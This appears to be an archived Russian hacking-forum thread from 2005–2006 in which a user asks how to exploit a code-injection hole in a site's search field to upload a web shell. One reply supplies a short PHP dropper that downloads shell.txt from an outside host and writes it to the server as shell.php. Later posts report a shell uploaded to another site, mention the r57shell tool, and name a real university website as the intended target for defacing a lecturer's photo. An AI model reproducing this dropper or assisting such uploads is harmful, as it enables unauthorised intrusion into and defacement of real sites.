ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Пара вопросиков.
  #1  
Старый 30.12.2005, 17:09
Аватар для Netch
Netch
Новичок
Регистрация: 09.08.2005
Сообщений: 17
Провел на форуме:
72048

Репутация: 0
Отправить сообщение для Netch с помощью ICQ
Question Пара вопросиков.

Есть сайт. Есть поиск на сайте. Поиск дает внедрять произвольный код (пробиваеш в поиске код и все, на странице результатов он исполнятеся (: ). Нужно зааплодить файло на этот сайт (шелл если быть точнее). Это возможно? Я где то читал, что можно зааплодить через скрипт, только не помню где. Кто может - помогить плизз!
 
Ответить с цитированием

  #2  
Старый 30.12.2005, 21:34
Аватар для Tem
Tem
Banned
Регистрация: 05.10.2005
Сообщений: 965
Провел на форуме:
5888800

Репутация: 547


Отправить сообщение для Tem с помощью ICQ
По умолчанию

Я если правильно понел ты про инклуд говориш ? если это инклуд, то можна шелл залить, поставь сайт посмотрим.
 
Ответить с цитированием

  #3  
Старый 31.12.2005, 02:52
Аватар для NaX[no]rT
NaX[no]rT
Members of Antichat
Регистрация: 03.09.2005
Сообщений: 594
Провел на форуме:
3606217

Репутация: 685


Отправить сообщение для NaX[no]rT с помощью ICQ
По умолчанию

Код:
<?
$filename=implode(file( "http://www.site.com/shell.txt"));
$fd = fopen ("shell.php", "w+");
fputs ($fd,$filename,90000000000);
fclose ($fd);
?>
Это попробуй, если я правильно понял ...
 
Ответить с цитированием

  #4  
Старый 01.01.2006, 19:54
Аватар для Netch
Netch
Новичок
Регистрация: 09.08.2005
Сообщений: 17
Провел на форуме:
72048

Репутация: 0
Отправить сообщение для Netch с помощью ICQ
По умолчанию

И еще, на одном сайте, при попытке открыть залитый шелл, вот что вышло (:
Код:
Internal Server Error
The server encountered an internal error or misconfiguration and was unable to complete your request.

Please contact the server administrator, wwwadmin@rpgarea.ru and inform them of the time the error occurred, and anything you might have done that may have caused the error.

More information about this error may be available in the server error log.

Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
Internal Server Error
The server encountered an internal error or misconfiguration and was unable to complete your request.

Please contact the server administrator, wwwadmin@rpgarea.ru and inform them of the time the error occurred, and anything you might have done that may have caused the error.

More information about this error may be available in the server error log.

Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
Apache/1.3.34 Server at www.sacred.net.ru Port 80
Может кто ни будь знает, что можно сделать?
 
Ответить с цитированием

  #5  
Старый 01.01.2006, 19:57
Аватар для Netch
Netch
Новичок
Регистрация: 09.08.2005
Сообщений: 17
Провел на форуме:
72048

Репутация: 0
Отправить сообщение для Netch с помощью ICQ
По умолчанию

Юзаю r57Shell. Попробовал переиминовть его в r57shell.html, все ОК, все открулось, но вот только не хочет он нормально работать.
 
Ответить с цитированием

  #6  
Старый 06.01.2006, 19:29
Аватар для Netch
Netch
Новичок
Регистрация: 09.08.2005
Сообщений: 17
Провел на форуме:
72048

Репутация: 0
Отправить сообщение для Netch с помощью ICQ
По умолчанию

Вот сайт.
http://www.rags.ru/
тут как раз уязвимость в поиске... Очень хотцца заменить фотку одного препода. (:
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
пара вопросов [500mhz] Уязвимости 7 18.12.2005 22:08
6 лет пользовался - вчера угнали - пара вопросов vlasyuk ICQ 25 22.10.2005 14:55
Пара слов о безопасности сайта k00p3r Чужие Статьи 2 12.06.2005 11:22



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ